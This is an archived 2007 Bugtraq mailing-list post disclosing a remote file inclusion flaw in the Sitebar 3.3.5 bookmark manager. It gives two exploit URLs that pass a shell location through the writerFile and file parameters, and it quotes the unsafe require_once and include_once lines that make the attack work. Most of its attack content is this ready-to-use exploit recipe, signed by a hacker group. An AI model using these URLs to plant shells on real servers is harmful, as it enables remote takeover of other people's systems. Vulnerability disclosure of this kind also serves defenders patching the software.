[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY7-F23F0308F31EE74FC9D1048D85C0@phx.gbl>
Date: Sat, 14 Apr 2007 21:53:27 +0300
From: "?? ???? ??????" <lo-talt-alayam@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Sitebar 3.3.5 (index.php writerFile)Remote File Include Vulnerabilities
Sitebar <= 3.3.5 Remote File Include Vulnerabilities
### #### ###### ###### ###### ### ## ##################
# D.Script:
http://scripts.ringsworld.com/bookmark-management/sitebar-3.3.5.zip
########### ###### ## ##########
# -::AUTHOR: VerY-SecReT
### ## ## ####### #######
#Homepage: http://www.sniper-sa.com
#### ##### ########### ############
# Exploit: :-
#[target]/sitebar/index.php?writerFile=Shell
#[target]/sitebar/Integrator.php?file=Shell
# ### ######## ########### #################
#$Includer:
#(index.php) require_once($writerFile);
#(Integrator.php) include_once($file);
######## ###################
## Thanx to: SnIpEr-Sa & 10x Master Of Hacker & Silent Hell
############################################################
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists